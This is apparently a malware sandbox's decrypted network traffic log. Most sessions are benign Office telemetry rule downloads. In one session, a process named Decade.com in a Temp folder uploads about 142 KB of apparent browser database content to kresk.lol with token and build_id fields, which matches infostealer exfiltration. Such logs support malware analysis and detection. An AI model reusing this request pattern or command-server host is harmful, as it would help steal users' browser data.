2024-12-04 11:17:29 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.4	49829	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:29 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:29 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:29 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: 68175a90-d01e-0065-3ed1-45b77a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111729Z-1746fd949bdjrnwqhC1EWRpg280000000150000000005xhh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:29 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.4	49830	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:29 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:29 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:29 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: bcf9f347-101e-007a-60d2-45047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111729Z-1746fd949bd2cq7chC1EWRnx9g00000000p0000000008z2f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:29 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.4	49831	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:29 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:30 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:29 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: 2aa810bc-801e-008f-63c1-452c5d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111729Z-1746fd949bd2cq7chC1EWRnx9g00000000s0000000004va3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:30 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.4	49828	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:31 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:31 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:31 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 859db5fc-901e-005b-23cb-452005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111731Z-1746fd949bd7wvgbhC1EWR0rgs000000019g0000000001gq x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:31 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49835	159.69.102.165	443	7368	C:\Users\user\AppData\Local\Temp\112974\Decade.com

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:31 UTC	319	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----Z5P8GDTJM7G4E3O8Q1DB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: kresk.lol Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
2024-12-04 11:17:31 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 5a 35 50 38 47 44 54 4a 4d 37 47 34 45 33 4f 38 51 31 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 39 36 34 39 64 36 38 62 33 64 34 66 30 34 35 66 32 37 64 65 35 38 35 39 38 65 66 37 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 50 38 47 44 54 4a 4d 37 47 34 45 33 4f 38 51 31 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 33 33 63 35 30 61 33 61 36 32 37 35 66 66 33 31 62 37 38 64 30 64 36 35 31 32 33 61 64 31 34 0d 0a 2d 2d 2d 2d 2d 2d 5a 35 50 38 47 44 54 4a 4d 37 47 34 45 33 4f 38 51 31 44 42 0d 0a 43 6f 6e 74 Data Ascii: ------Z5P8GDTJM7G4E3O8Q1DBContent-Disposition: form-data; name="token"89649d68b3d4f045f27de58598ef771d------Z5P8GDTJM7G4E3O8Q1DBContent-Disposition: form-data; name="build_id"933c50a3a6275ff31b78d0d65123ad14------Z5P8GDTJM7G4E3O8Q1DBCont
2024-12-04 11:17:31 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:31 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:31 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:31 UTC	16355	OUT	Data Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56 Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
2024-12-04 11:17:31 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:31 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:31 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:31 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-04 11:17:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 11:17:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-04 11:17:33 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	49834	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:17:31 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-04 11:17:32 UTC	470	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:17:31 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: 0312aba8-e01e-0085-12cc-45c311000000 x-ms-version: 2018-03-28 x-azure-ref: 20241204T111731Z-1746fd949bdwt8wrhC1EWRu6rg00000001cg0000000008x0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-04 11:17:32 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.4	49833	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
